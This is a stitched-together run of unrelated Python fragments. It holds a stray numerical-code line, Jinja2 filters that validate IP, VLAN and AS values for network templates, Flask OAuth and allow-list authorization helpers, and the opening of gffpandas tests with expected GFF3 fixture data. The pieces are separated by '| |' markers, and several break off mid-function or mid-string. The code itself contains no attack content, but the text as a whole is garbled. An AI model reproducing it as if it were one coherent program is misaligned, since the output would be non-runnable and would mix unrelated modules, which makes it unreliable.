planewaves = preprocess_planewaves(planewaves, max_levels)
# Check that the user has defined functions for B at | |
"""
Custom Jinja2 template filters
"""
import re
import logging
import ipaddresstools as ipv4
J2_FILTER_LOGGER = logging.getLogger('qct_template_filter')
def filter_check_u_ip_address(value):
    """Function to check for a unicast ipv4 address in a template

    :type value: String
    :param value: Value to check if it is a IPv4 Unicast address
    :rtype: String
    :returns: value, or an error
    """
    error = f'{value} !!!! possible error this is required to be a unicast ipv4 address !!!!'
    # Accept only non-empty values that validate as unicast IPv4.
    if value and ipv4.ucast_ip(value, return_tuple=False):
        return value
    J2_FILTER_LOGGER.info('filter_check_u_ip_address %s', error)
    return error
def filter_check_subnet(value):
    """Function to check for a subnet and mask combo in a template

    :type value: String
    :param value: Value to check if it is a IPv4 Subnet in CIDR format
    :rtype: String
    :returns: The value or an error
    """
    error = f'{value} !!!! possible error this is required to be a ipv4 subnet !!!!'
    # Accept only non-empty values that validate as subnet/mask in CIDR form.
    if value and ipv4.ip_mask(value, return_tuple=False):
        return value
    J2_FILTER_LOGGER.info('filter_check_subnet %s', error)
    return error
def filter_check_ip_mask_cidr(value):
    """Function to check to a CIDR mask number in a template

    :type value: String
    :param value: The value to check if it is a CIDR value
    :rtype: String
    :return: The value or an error
    """
    error = f'{value} !!!! possible error this is required to be a ipv4 subnet mask in CIDR!!!!'
    if not value:
        J2_FILTER_LOGGER.info('filter_check_ip_mask_cidr %s', error)
        return error
    try:
        cidr = int(value)
    except ValueError as caught:  # pylint: disable=invalid-name
        J2_FILTER_LOGGER.info('filter_check_ip_mask_cidr %s %s', error, caught)
        return error
    # A missing conversion entry means the CIDR length is out of range
    # (historically returned the error without logging).
    return value if ipv4.mask_conversion.get(cidr) else error
def filter_check_ip_mask_standard(value):
    """
    Function to check for a standard mask in a template

    :param value: candidate standard subnet mask (e.g. '255.255.255.0')
    :return: the value if it matches a known mask, otherwise an error string
    """
    error = f'{value} !!!! possible error this is required to be a ipv4 standard subnet mask!!!!'
    if value:
        # Accept the value as soon as any conversion-table entry matches.
        if any(ipv4.mask_conversion.get(key).get('MASK') == value
               for key in ipv4.mask_conversion):
            return value
    # Falsy input, no match, or an empty conversion table (which previously
    # fell through and implicitly returned None) all report the error.
    J2_FILTER_LOGGER.info('filter_check_ip_mask_standard %s', error)
    return error
def filter_check_vlan_number(value):
    """
    Function to check for a good VLAN number in a template
    :param value:
    :return:
    """
    error = f'{value} !!!! possible error the VLAN# should be between 1 and 4096!!!!'
    if not value:
        J2_FILTER_LOGGER.info('filter_check_vlan_number %s', error)
        return error
    try:
        vlan = int(value)
    except ValueError as caught:  # pylint: disable=invalid-name
        J2_FILTER_LOGGER.info('filter_check_vlan_number %s, caught %s', error, caught)
        return error
    # Out-of-range values historically return the error without logging.
    return value if 1 <= vlan <= 4096 else error
def filter_check_vni_number(value):
    """
    Function to check for a good VNI number in a template
    :param value:
    :return:
    """
    error = f'{value} !!!! possible error the VNI# should be between 1 and 16777214!!!!'
    if not value:
        J2_FILTER_LOGGER.info('filter_check_vni_number %s', error)
        return error
    try:
        vni = int(value)
    except ValueError as caught:  # pylint: disable=invalid-name
        J2_FILTER_LOGGER.info('filter_check_vni_number %s, caught %s', error, caught)
        return error
    # Out-of-range values historically return the error without logging.
    return value if 1 <= vni <= 16777214 else error
def filter_check_ip_inverse_mask_standard(value):
    """
    Function to check for a inverse mask in a template

    :param value: candidate inverse (wildcard) mask (e.g. '0.0.0.255')
    :return: the value if it matches a known inverse mask, otherwise an error string
    """
    error = f'{value} !!!! possible error this is required to be a ipv4 inverse subnet mask!!!!'
    if value:
        # Accept the value as soon as any conversion-table entry matches.
        if any(ipv4.mask_conversion.get(key).get('INVMASK') == value
               for key in ipv4.mask_conversion):
            return value
    # Falsy input, no match, or an empty conversion table (which previously
    # fell through and implicitly returned None) all report the error.
    J2_FILTER_LOGGER.info('filter_check_ip_inverse_mask_standard %s', error)
    return error
def filter_check_m_ip_address(value):
    """
    Function to check for a multicast ipv4 address in a template
    :param value:
    :return:
    """
    error = f'{value} !!!! possible error this is required to be a multicast ipv4 address !!!!'
    # Accept only non-empty values that validate as multicast IPv4.
    if value and ipv4.mcast_ip(value, return_tuple=False):
        return value
    J2_FILTER_LOGGER.info('filter_check_m_ip_address %s', error)
    return error
def filter_check_as_number(value):
    """
    Function to check for a good BGP AS, EIGRP AS, OSPF Process in a template
    :param value:
    :return:
    """
    error = f'{value} !!!! possible error the AS# should be between 1 and 65535!!!!'
    if not value:
        J2_FILTER_LOGGER.info('filter_check_as_number %s', error)
        return error
    try:
        asn = int(value)
    except ValueError as caught:  # pylint: disable=invalid-name
        J2_FILTER_LOGGER.info('filter_check_as_number %s, caught %s', error, caught)
        return error
    if 1 <= asn <= 65535:
        return value
    J2_FILTER_LOGGER.info('filter_check_as_number %s', error)
    return error
def filter_check_required(value):
    """
    Function to check for a required value in a template
    :param value:
    :return:
    """
    if value:
        return value
    error = f'{value} !!!! This is a required value!!!!'
    J2_FILTER_LOGGER.info('filter_check_required %s', error)
    return error
def filter_check_community(value):
    """
    Function to check for a community in a template
    :param value:
    :return:
    """
    error = f'{value} !!!! possible error the community should be in this format XXX:XXX!!!!'
    community_pattern = re.compile(r'^[0-9]+:[0-9]+$')
    # Accept only non-empty values shaped like digits:digits.
    if value and community_pattern.match(str(value)):
        return value
    J2_FILTER_LOGGER.info('filter_check_community %s', error)
    return error
def filter_check_mac_address(value):
    """
    Function to check for a mac-address in a template
    :param value:
    :return:
    """
    error = f'{value} !!!! possible error the mac-address should be in this format ' \
            f'xxxx.xxxx.xxxx, and only contain 0-9 or a-f!!!!'
    mac_pattern = re.compile(r'^([0-9]|[a-f]){4}\.([0-9]|[a-f]){4}\.([0-9]|[a-f]){4}$', re.IGNORECASE)
    # Accept only non-empty values in dotted-quad-hex (Cisco) notation.
    if value and mac_pattern.match(str(value)):
        return value
    J2_FILTER_LOGGER.info('filter_check_mac_address %s', error)
    return error
def filter_check_permit_or_deny(value):
    """
    Function to check for permit, or deny in a template
    :param value:
    :return:
    """
    error = f'{value} !!!! possible error should be permit or deny!!!!'
    # Membership implies a non-empty value, so one check covers both
    # historical failure branches (which log the same message).
    if value in ('permit', 'deny'):
        return value
    J2_FILTER_LOGGER.info('filter_check_permit_or_deny %s', error)
    return error
def filter_check_inside_or_outside(value):
    """
    Function to check for inside, or outside in a template
    :param value:
    :return:
    """
    error = f'{value} !!!! possible error should be inside or outside!!!!'
    # Membership implies a non-empty value, so one check covers both
    # historical failure branches (which log the same message).
    if value in ('inside', 'outside'):
        return value
    J2_FILTER_LOGGER.info('filter_check_inside_or_outside %s', error)
    return error
def filter_check_number(value):
    """
    Function to check for any number in a template
    :param value:
    :return:
    """
    error = f'{value} !!!! possible error this should be any number!!!!'
    if not value:
        J2_FILTER_LOGGER.info('filter_check_number %s', error)
        return error
    try:
        int(value)  # only the parseability matters; the original value is returned
    except ValueError as caught:  # pylint: disable=invalid-name
        J2_FILTER_LOGGER.info('filter_check_number %s, caught %s', error, caught)
        return error
    return value
def filter_check_route_map_match_items(value):
    """
    Function to check route-map match options in a template
    :param value:
    :return:
    """
    error = f'{value} !!!! possible error check template for possible match items!!!!'
    allowed_matches = ('ip address prefix-list', 'as-path', 'ip address', 'community',
                       'extcommunity', 'ip multicast group')
    # Membership implies a non-empty value; both failure branches log the
    # same message, so one check suffices.
    if value in allowed_matches:
        return value
    J2_FILTER_LOGGER.info('filter_check_route_map_match_items %s', error)
    return error
def filter_check_route_map_set_items(value):
    """
    Function to check route-map set options in a template
    :param value:
    :return:
    """
    error = f'{value} !!!! possible error check template for possible set items!!!!'
    allowed_sets = ('local-preference', 'weight', 'community', 'as-path prepend',
                    'as-path prepend last-as')
    # Membership implies a non-empty value; both failure branches log the
    # same message, so one check suffices.
    if value in allowed_sets:
        return value
    J2_FILTER_LOGGER.info('filter_check_route_map_set_items %s', error)
    return error
def filter_check_protocol_port_number(value):
    """
    Function to check for a good protocol port number in a template
    :param value:
    :return:
    """
    error = f'{value} !!!! possible error should be between 0 and 65535!!!!'
    if not value:
        J2_FILTER_LOGGER.info('filter_check_protocol_port_number %s', error)
        return error
    try:
        port = int(value)
    except ValueError as caught:  # pylint: disable=invalid-name
        J2_FILTER_LOGGER.info('filter_check_protocol_port_number %s, caught %s', error, caught)
        return error
    if 0 <= port <= 65535:
        return value
    J2_FILTER_LOGGER.info('filter_check_protocol_port_number %s', error)
    return error
def filter_calculate_neighbor_ip_mask_30(value):
    """
    Function to calculate a neighbors IP using a 30 bit mask
    :param value:
    :return: An error, or a IP address
    """
    error = f'{value} !!!! possible error should be a valid ipv4 address!!!!'
    if not value:
        J2_FILTER_LOGGER.info('filter_calculate_neighbor_ip_mask_30 %s', error)
        return error
    try:
        if not ipv4.ip(value, return_tuple=False):
            J2_FILTER_LOGGER.info('filter_calculate_neighbor_ip_mask_30 %s', error)
            return error
        # Only the far side of the /30 point-to-point link is needed.
        _, neighbor_ip = ipv4.get_neighbor_ip(value, '30')
        return neighbor_ip
    except ValueError as caught:  # pylint: disable=invalid-name
        J2_FILTER_LOGGER.info('filter_calculate_neighbor_ip_mask_30 %s, caught %s', error, caught)
        return error
def filter_calculate_neighbor_ip_mask_31(value):
"""
Function to calculate | |
import calendar
import datetime
import email.utils
import functools
import logging
import urllib.parse
from time import sleep
from typing import Callable, Collection

import flask
import netaddr
import pytz
import requests
from flask import request
from flask_limiter import Limiter
from flask_limiter.util import get_remote_address
from requests.exceptions import RequestException
from werkzeug.exceptions import Forbidden, Unauthorized, GatewayTimeout

from rdr_service import clock, config
from rdr_service.api import base_api
from rdr_service.config import GAE_PROJECT
# Timezone used when rendering RFC-2822 Date headers (see add_headers).
_GMT = pytz.timezone("GMT")
# OAuth scope requested of callers' tokens.
SCOPE = "https://www.googleapis.com/auth/userinfo.email"
# Attribute name on flask.g under which get_oauth_id() caches the validated email.
GLOBAL_CLIENT_ID_KEY = 'oauth_client_id'
def handle_database_disconnect(err):
    """Intended to catch DBAPIError's thrown during a request cycle and transform them into 503's.

    If the DBAPIError does not represent an invalidated connection, reraise the error.

    Usage: app.register_error_handler(DBAPIError, handle_database_disconnect)
    """
    if not err.connection_invalidated:
        raise err
    return "DB connection lost, please retry", 503
def auth_required_cron(func):
    """A decorator that ensures that the user is a cron job."""

    # functools.wraps preserves func's __name__/__doc__; without it every
    # decorated view is registered under the name "wrapped".
    @functools.wraps(func)
    def wrapped(*args, **kwargs):
        check_cron()
        return func(*args, **kwargs)

    return wrapped
def task_auth_required(func):
    """A decorator that ensures that the user is a task job."""

    # functools.wraps preserves func's __name__/__doc__; without it every
    # decorated view is registered under the name "wrapped".
    @functools.wraps(func)
    def wrapped(*args, **kwargs):
        # Allow local development, or genuine App Engine task-queue requests
        # (task-name header plus the AppEngine user agent).
        if GAE_PROJECT == "localhost" or (
            request.headers.get("X-Appengine-Taskname") and "AppEngine-Google" in request.headers.get("User-Agent", "")
        ):
            logging.info("App Engine task request ALLOWED for task endpoint.")
            return func(*args, **kwargs)
        logging.info("User {} NOT ALLOWED for task endpoint".format(get_oauth_id()))
        raise Forbidden()

    return wrapped
def nonprod(func):
    """The decorated function may never run in environments without config.ALLOW_NONPROD_REQUESTS."""

    # functools.wraps preserves func's __name__/__doc__; without it every
    # decorated view is registered under the name "wrapped".
    @functools.wraps(func)
    def wrapped(*args, **kwargs):
        if not config.getSettingJson(config.ALLOW_NONPROD_REQUESTS, False):
            raise Forbidden("Request not allowed in production environment (according to config).")
        return func(*args, **kwargs)

    return wrapped
def check_auth(role_allowed_list):
    """Raises Unauthorized or Forbidden if the current user is not allowed."""
    user_email, user_info = get_validated_user_info()
    granted_roles = set(user_info.get("roles", []))
    # Any overlap between the user's roles and the allowed roles grants access.
    if granted_roles.intersection(role_allowed_list):
        return
    logging.warning(f"User {user_email} has roles {user_info.get('roles')}, but {role_allowed_list} is required")
    raise Forbidden()
def get_auth_token():
    """Return the token portion of the Authorization header, or raise ValueError."""
    header = request.headers.get("Authorization", '')
    parts = header.split(' ', 1)
    if len(parts) < 2:
        raise ValueError(f"Invalid Authorization Header: {header}")
    return parts[1]
def get_token_info_response(token, use_tokeninfo=False):
    """Ask Google to validate *token*; returns the raw requests Response."""
    endpoint = 'tokeninfo' if use_tokeninfo else 'userinfo'
    google_tokeninfo_url = 'https://www.googleapis.com/oauth2/v3/' + endpoint
    qargs = urllib.parse.urlencode({'access_token': token})
    return requests.get(f"{google_tokeninfo_url}?{qargs}")
def get_oauth_id():
    """Returns user email ID if OAUTH token present, or None."""
    '''
    NOTES: 2019-08-15 by tanner and mikey
    currently verifies that the provided token
    is legitimate via google API.
    - performance
    - could be validated locally instead of with API
    '''
    # Fast path: a previous call during this request already validated the
    # token and cached the email on flask.g.
    if flask.g and GLOBAL_CLIENT_ID_KEY in flask.g:
        return getattr(flask.g, GLOBAL_CLIENT_ID_KEY)
    # Retry the Google round-trip a few times; starts with the UserInfo
    # endpoint and may fall back to Tokeninfo (see below).
    retries = 5
    use_tokeninfo_endpoint = False
    while retries:
        retries -= 1
        if GAE_PROJECT == 'localhost':  # NOTE: 2019-08-15 mimic devappserver.py behavior
            return config.LOCAL_AUTH_USER
        try:
            token = get_auth_token()
        except ValueError as e:
            # Missing/malformed Authorization header: not an auth failure,
            # just report "no user".
            logging.info(f"Invalid Authorization Token: {e}")
            return None
        else:
            try:
                response = get_token_info_response(token, use_tokeninfo=use_tokeninfo_endpoint)
            except RequestException as e:  # Catching any connection or decoding errors that could be thrown
                logging.warning(f'Error validating token: {e}')
            else:
                if response.status_code == 200:
                    data = response.json()
                    if use_tokeninfo_endpoint:  # UserInfo doesn't return expiry info :(
                        token_expiry_seconds = data.get('expires_in')
                        logging.info(f'Token expiring in {token_expiry_seconds} seconds')
                    user_email = data.get('email')
                    if user_email is None:
                        # UserInfo answered but without an email; switch to
                        # Tokeninfo for the next retry.
                        logging.error('UserInfo endpoint did not return the email')
                        use_tokeninfo_endpoint = True
                    else:
                        # Cache on flask.g so later calls this request skip
                        # the network round-trip.
                        if flask.g:
                            setattr(flask.g, GLOBAL_CLIENT_ID_KEY, user_email)
                        return user_email
                else:
                    logging.info(f"Oauth failure: {response.content} (status: {response.status_code})")
                    if response.status_code in [400, 401]:  # tokeninfo returns 400
                        raise Unauthorized
                    elif not use_tokeninfo_endpoint:
                        logging.error("UserInfo failed, falling back on Tokeninfo")
                        use_tokeninfo_endpoint = True
        # Brief pause between retries to avoid hammering the endpoint.
        sleep(0.25)
        logging.info('Retrying authentication call to Google after failure.')
    raise GatewayTimeout('Google authentication services is not available, try again later.')
def check_cron():
    """Raises Forbidden if the current user is not a cron job."""
    # App Engine sets this header only on genuine cron invocations.
    if not request.headers.get("X-Appengine-Cron"):
        logging.info("User {} NOT ALLOWED for cron endpoint".format(get_oauth_id()))
        raise Forbidden()
    logging.info("Appengine-Cron ALLOWED for cron endpoint.")
def lookup_user_info(user_email):
    """Return the configured user-info dict for *user_email*, or None."""
    all_user_info = config.getSettingJson(config.USER_INFO, {})
    return all_user_info.get(user_email)
def get_account_origin_id():
    """
    Returns the clientId value set in the config for the user.
    :return: Client Id
    """
    auth_email = get_oauth_id()
    user_info = lookup_user_info(auth_email)
    client_id = user_info.get('clientId', None)
    from rdr_service.api_util import DEV_MAIL
    if not client_id and auth_email == DEV_MAIL:
        # TODO: This is a hack because something sets up configs different
        # when running all tests and it doesnt have the clientId key.
        client_id = "example"
    return client_id
def is_self_request():
    """True for internal requests (no remote address, nonprod allowed, not marked unauthenticated)."""
    if request.remote_addr is not None:
        return False
    if not config.getSettingJson(config.ALLOW_NONPROD_REQUESTS, False):
        return False
    return not request.headers.get("unauthenticated")
def get_allowed_ips(user_info):
    """Parse the user's allowed IP ranges into netaddr.IPNetwork objects, or None if unrestricted."""
    # New key first, legacy "whitelisted" key as fallback.
    ranges = user_info.get("allow_list_ip_ranges") or user_info.get("whitelisted_ip_ranges")
    if not ranges:
        return None
    combined = ranges.get("ip6", []) + ranges.get("ip4", [])
    return [netaddr.IPNetwork(rng) for rng in combined]
def enforce_ip_allowed(request_ip, allowed_ips):
    """Raise Forbidden unless *request_ip* falls inside one of *allowed_ips*.

    :param request_ip: client IP string
    :param allowed_ips: list of netaddr.IPNetwork; empty/None means
        "don't apply restrictions"
    """
    if not allowed_ips:
        return
    logging.info("IP RANGES ALLOWED: {}".format(allowed_ips))
    ip = netaddr.IPAddress(request_ip)
    # any() short-circuits; the original built a throwaway list first.
    if not any(ip in rng for rng in allowed_ips):
        logging.info("IP {} NOT ALLOWED".format(ip))
        raise Forbidden("Client IP not allowed: {}".format(ip))
    logging.info("IP {} ALLOWED".format(ip))
def get_allowed_appids(user_info):
    """Return the configured allowed app IDs (new key first, legacy fallback), or None."""
    return user_info.get("allow_list_appids") or user_info.get("whitelisted_appids")
def enforce_appid_allowed(request_app_id, allowed_appids):
    """Raise Forbidden unless *request_app_id* is in *allowed_appids* (no list = no restriction)."""
    if not allowed_appids:
        return
    if request_app_id and request_app_id in allowed_appids:
        logging.info("APP ID {} ALLOWED".format(request_app_id))
        return
    # Log which of the two failure modes occurred before rejecting.
    if request_app_id:
        logging.info("APP ID {} NOT FOUND IN {}".format(request_app_id, allowed_appids))
    else:
        logging.info("NO APP ID FOUND WHEN REQUIRED TO BE ONE OF: {}".format(allowed_appids))
    raise Forbidden()
def add_headers(response):
    """Add uniform headers to all API responses.

    All responses are JSON, so we tag them as such at the app level to provide uniform protection
    against content-sniffing-based attacks.
    """
    headers = response.headers
    headers["Content-Disposition"] = 'attachment; filename="f.txt"'
    headers["X-Content-Type-Options"] = "nosniff"
    headers["Content-Type"] = "application/json; charset=utf-8"  # override to add charset
    now_gmt = pytz.utc.localize(clock.CLOCK.now()).astimezone(_GMT)
    headers["Date"] = email.utils.formatdate(calendar.timegm(now_gmt.timetuple()), usegmt=True)
    headers["Pragma"] = "no-cache"
    headers["Cache-control"] = "no-cache, must-revalidate"
    # Expire at some date in the past: the epoch.
    headers["Expires"] = email.utils.formatdate(0.0, usegmt=True)
    return response
def request_logging():
    """Some uniform logging of request characteristics before any checks are applied."""
    https_flag = request.environ.get("HTTPS")
    logging.info("Request protocol: HTTPS={}".format(https_flag))
def auth_required(role_allowed_list):
    """A decorator that keeps the function from being called without auth.

    role_allowed_list can be a string or list of strings specifying one or
    more roles that are allowed to call the function. """
    if not role_allowed_list:
        raise AssertionError("Can't call auth_required with empty role_allowed_list.")
    if not isinstance(role_allowed_list, list):
        role_allowed_list = [role_allowed_list]

    def auth_required_wrapper(func):
        def wrapped(*args, **kwargs):
            appid = GAE_PROJECT
            # Open an API-request log record before any auth checks run so
            # even rejected requests can be correlated.
            request.log_record = base_api.log_api_request()
            # Only enforce HTTPS and auth for external requests; requests made for data generation
            # are allowed through (when enabled).
            acceptable_hosts = ("None", "testbed-test", "testapp", "localhost", "127.0.0.1")
            # logging.info(str(request.headers))
            if not is_self_request():
                if request.scheme.lower() != "https" and appid not in acceptable_hosts:
                    raise Unauthorized(f"HTTPS is required for {appid}", www_authenticate='Bearer realm="rdr"')
                check_auth(role_allowed_list)
            # Handlers may log the record themselves and set request.logged;
            # otherwise we persist it after the handler returns.
            request.logged = False
            result = func(*args, **kwargs)
            if request.logged is False:
                try:
                    base_api.log_api_request(log=request.log_record)
                except RuntimeError:
                    # Unittests don't always setup a valid flask request context.
                    pass
            return result
        return wrapped
    return auth_required_wrapper
def restrict_to_gae_project(allowed_project_list):
    """
    A decorator for restricting access of a method
    to a particular Google App Engine Project
    :param allowed_project_list: list of GAE ids, i.e. 'all-of-us-rdr-stable', etc.
    :return: function result or Forbidden
    """
    def restriction_function_wrapper(func):
        # functools.wraps keeps func's identity for routing/introspection,
        # consistent with the other auth decorators in this module.
        @functools.wraps(func)
        def inner(*args, **kwargs):
            app_id = GAE_PROJECT
            # Check app_id against the registered environments; reject early
            # (the old code referenced `result` outside its assigning branch).
            if app_id not in allowed_project_list:
                raise Forbidden(f'This operation is forbidden on {app_id}')
            return func(*args, **kwargs)
        return inner
    return restriction_function_wrapper
def get_validated_user_info():
    """Returns a valid (user email, user info), or raises Unauthorized or Forbidden."""
    user_email = get_oauth_id()

    # Allow clients to simulate an unauthentiated request (for testing)
    # because we haven't found another way to create an unauthenticated request
    # when using dev_appserver. When client tests are checking to ensure that an
    # unauthenticated requests gets rejected, they helpfully add this header.
    # The `application_id` check ensures this feature only works in dev_appserver.
    if request.headers.get("unauthenticated") and GAE_PROJECT == 'localhost':
        user_email = None
    if user_email is None:
        raise Unauthorized("No OAuth user found.")

    user_info = lookup_user_info(user_email)
    if user_info:
        # Behind App Engine the original client address arrives in this
        # header; request.remote_addr would otherwise be the proxy.
        if 'X-Appengine-User-Ip' in request.headers:
            addr = request.headers.get('X-Appengine-User-Ip')
        else:
            addr = request.remote_addr
        # Both enforcement calls raise Forbidden on violation.
        enforce_ip_allowed(addr, get_allowed_ips(user_info))
        enforce_appid_allowed(request.headers.get("X-Appengine-Inbound-Appid"), get_allowed_appids(user_info))
        logging.info(f"User {user_email} ALLOWED")
        return (user_email, user_info)
    logging.info(f"User {user_email} NOT ALLOWED")
    raise Forbidden()
class ObjectView(object):
    """access dict attributes as an object"""

    def __init__(self, d):
        # Bind the mapping directly as the instance namespace so every key
        # becomes an attribute.
        self.__dict__ = d
class ObjDict(dict):
    """Subclass dict to treat new dicts like objects"""

    def __getattr__(self, name):
        # EAFP: a single lookup instead of membership test + lookup.
        try:
            return self[name]
        except KeyError:
            raise AttributeError("No such attribute: " + name) from None

    def __setattr__(self, name, value):
        self[name] = value

    def __delattr__(self, name):
        try:
            del self[name]
        except KeyError:
            raise AttributeError("No such attribute: " + name) from None
def datetime_as_naive_utc(value):
    """Convert a datetime to a naive (tzinfo-free) datetime expressed in UTC.

    Naive datetimes are assumed to already be in UTC and are returned unchanged.

    :param value: a ``datetime.datetime``, naive or timezone-aware
    :return: a naive ``datetime.datetime`` in UTC
    :raises TypeError: if ``value`` is not a ``datetime.datetime``
    """
    if not isinstance(value, datetime.datetime):
        raise TypeError("datetime_as_naive_utc() only works on datetime.datetime values")
    if value.tzinfo is None:
        return value
    # Use the stdlib UTC tzinfo instead of the third-party pytz.UTC;
    # the resulting naive datetime is identical.
    return value.astimezone(datetime.timezone.utc).replace(tzinfo=None)
def is_care_evo_and_not_prod():
    """True when the request origin is CareEvolution and this is not the prod project."""
    # Guard clause keeps the original short-circuit: the origin lookup is
    # only performed when we are not on the prod project.
    if GAE_PROJECT == "all-of-us-rdr-prod":
        return False
    return get_account_origin_id() == "careevolution"
def install_rate_limiting(app):
    """Attach a rate limiter to *app* using limits and storage from config.

    The rate-limit key is the authenticated OAuth id when available, falling
    back to the caller's remote address.
    NOTE(review): Limiter is presumably flask-limiter's Limiter — confirm
    against the file's imports.
    """
    # Storage backend and default limit are configurable; both have safe defaults.
    cache_location = config.getSettingJson('cache_storage_location', default='memory://')
    default_rate_limit = config.getSettingJson('default_rate_limit', default='15/second')
    Limiter(
        app,
        key_func=lambda: get_oauth_id() or get_remote_address(),
        default_limits=[default_rate_limit],
        storage_uri=cache_location,
        in_memory_fallback_enabled=True  # Use local memory if cache not found (throws an error otherwise)
    )
class BatchManager:
"""Useful for applying a function to a batch of objects."""
def | |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""Tests for `gffpandas` package."""
# standard library imports
import shutil
import time
from pathlib import Path
# first-party imports
import gffpandas.gffpandas as gff3pd
# third-party imports
import pandas as pd
# module imports
from . import print_docstring
# global constants
# Remote RefSeq annotation release used for the human-genome download tests.
REFSEQ_URL = (
    "https://ftp.ncbi.nih.gov/genomes/refseq/vertebrate_mammalian"
    "/Homo_sapiens/annotation_releases/109.20191205/GCF_000001405.39_GRCh38.p13/"
)
# GFF3 annotation file name within that release.
HUMAN_GFF = "GCF_000001405.39_GRCh38.p13_genomic.gff"
# Local fixture files the tests expect to find.
TESTFILELIST = ["test_file.gff"]
# Expected DataFrame contents of the test GFF3 file: one row per feature,
# in the nine standard GFF3 columns.
written_df = pd.DataFrame(
    [
        [
            "NC_016810.1",
            "RefSeq",
            "region",
            1,
            4000,
            ".",
            "+",
            ".",
            "Dbxref=taxon:216597;ID=id0;gbkey=Src;genome=genomic;mol_type="
            "genomic DNA;serovar=Typhimurium;strain=SL1344",
        ],
        [
            "NC_016810.1",
            "RefSeq",
            "gene",
            1,
            20,
            ".",
            "+",
            ".",
            "ID=gene1;Name=thrL;gbkey=Gene;gene=thrL;locus_tag=SL1344_0001",
        ],
        [
            "NC_016810.1",
            "RefSeq",
            "CDS",
            13,
            235,
            ".",
            "+",
            "0",
            "Dbxref=UniProtKB%252FTrEMBL:E1W7M4%2CGenbank:YP_005179941.1;ID="
            "cds0;Name=YP_005179941.1;Parent=gene1;gbkey=CDS;product=thr operon"
            " leader peptide;protein_id=YP_005179941.1;transl_table=11",
        ],
        [
            "NC_016810.1",
            "RefSeq",
            "gene",
            1,
            20,
            ".",
            "+",
            ".",
            "ID=gene2;Name=thrA;gbkey=Gene;gene=thrA;locus_tag=SL1344_0002",
        ],
        [
            "NC_016810.1",
            "RefSeq",
            "CDS",
            341,
            523,
            ".",
            "+",
            "0",
            "Dbxref=UniProtKB%252FTrEMBL:E1W7M4%2CGenbank:YP_005179941.1;ID="
            "cds0;Name=YP_005179941.1;Parent=gene2;gbkey=CDS;product=thr operon"
            " leader peptide;protein_id=YP_005179941.1;transl_table=11",
        ],
        [
            "NC_016810.1",
            "RefSeq",
            "gene",
            1,
            600,
            ".",
            "-",
            ".",
            "ID=gene3;Name=thrX;gbkey=Gene;gene=thrX;locus_tag=SL1344_0003",
        ],
        [
            "NC_016810.1",
            "RefSeq",
            "CDS",
            21,
            345,
            ".",
            "-",
            "0",
            "Dbxref=UniProtKB%252FTrEMBL:E1W7M4%2CGenbank:YP_005179941.1;ID="
            "cds0;Name=YP_005179941.1;Parent=gene3;gbkey=CDS;product=thr operon"
            " leader peptide;protein_id=YP_005179941.1;transl_table=11",
        ],
        [
            "NC_016810.1",
            "RefSeq",
            "gene",
            41,
            255,
            ".",
            "+",
            ".",
            "ID=gene4;Name=thrB;gbkey=Gene;gene=thrB;locus_tag=SL1344_0004",
        ],
        [
            "NC_016810.1",
            "RefSeq",
            "CDS",
            61,
            195,
            ".",
            "+",
            "0",
            "Dbxref=UniProtKB%252FTrEMBL:E1W7M4%2CGenbank:YP_005179941.1;ID="
            "cds0;Name=YP_005179941.1;Parent=gene4;gbkey=CDS;product=thr operon"
            " leader peptide;protein_id=YP_005179941.1;transl_table=11",
        ],
        [
            "NC_016810.1",
            "RefSeq",
            "gene",
            170,
            546,
            ".",
            "+",
            ".",
            "ID=gene5;Name=thrC;gbkey=Gene;gene=thrC;locus_tag=SL1344_0005",
        ],
        [
            "NC_016810.1",
            "RefSeq",
            "CDS",
            34,
            335,
            ".",
            "+",
            "0",
            "Dbxref=UniProtKB%252FTrEMBL:E1W7M4%2CGenbank:YP_005179941.1;ID="
            "cds0;Name=YP_005179941.1;Parent=gene5;gbkey=CDS;product=thr operon"
            " leader peptide;protein_id=YP_005179941.1;transl_table=11",
        ],
    ],
    columns=[
        "seq_id",
        "source",
        "type",
        "start",
        "end",
        "score",
        "strand",
        "phase",
        "attributes",
    ],
)
written_header = "##gff-version 3\n" "##sequence-region NC_016810.1 1 20\n"
written_csv = (
"seq_id,source,type,start,end,score,strand,phase,attributes\n"
"NC_016810.1,RefSeq,region,1,4000,.,+,.,Dbxref=taxon:216597;ID="
"id0;gbkey=Src;genome=genomic;mol_type=genomic DNA;serovar="
"Typhimurium;strain=SL1344\n"
"NC_016810.1,RefSeq,gene,1,20,.,+,.,ID=gene1;Name=thrL;gbkey="
"Gene;gene=thrL;locus_tag=SL1344_0001\n"
"NC_016810.1,RefSeq,CDS,13,235,.,+,0,Dbxref=UniProtKB%252FTr"
"EMBL:E1W7M4%2CGenbank:YP_005179941.1;ID=cds0;Name=YP_0051799"
"41.1;Parent=gene1;gbkey=CDS;product=thr operon leader peptide;"
"protein_id=YP_005179941.1;transl_table=11\n"
"NC_016810.1,RefSeq,gene,1,20,.,+,.,ID=gene2;Name=thrA;gbkey="
"Gene;gene=thrA;locus_tag=SL1344_0002\n"
"NC_016810.1,RefSeq,CDS,341,523,.,+,0,Dbxref=UniProtKB%252FTr"
"EMBL:E1W7M4%2CGenbank:YP_005179941.1;ID=cds0;Name=YP_0051799"
"41.1;Parent=gene2;gbkey=CDS;product=thr operon leader peptide;"
"protein_id=YP_005179941.1;transl_table=11\n"
"NC_016810.1,RefSeq,gene,1,600,.,-,.,ID=gene3;Name=thrX;gbkey="
"Gene;gene=thrX;locus_tag=SL1344_0003\n"
"NC_016810.1,RefSeq,CDS,21,345,.,-,0,Dbxref=UniProtKB%252FTr"
"EMBL:E1W7M4%2CGenbank:YP_005179941.1;ID=cds0;Name=YP_0051799"
"41.1;Parent=gene3;gbkey=CDS;product=thr operon leader peptide;"
"protein_id=YP_005179941.1;transl_table=11\n"
"NC_016810.1,RefSeq,gene,41,255,.,+,.,ID=gene4;Name=thrB;gbkey="
"Gene;gene=thrB;locus_tag=SL1344_0004\n"
"NC_016810.1,RefSeq,CDS,61,195,.,+,0,Dbxref=UniProtKB%252FTr"
"EMBL:E1W7M4%2CGenbank:YP_005179941.1;ID=cds0;Name=YP_0051799"
"41.1;Parent=gene4;gbkey=CDS;product=thr operon leader peptide;"
"protein_id=YP_005179941.1;transl_table=11\n"
"NC_016810.1,RefSeq,gene,170,546,.,+,.,ID=gene5;Name=thrC;gbkey"
"=Gene;gene=thrC;locus_tag=SL1344_0005\n"
"NC_016810.1,RefSeq,CDS,34,335,.,+,0,Dbxref=UniProtKB%252FTr"
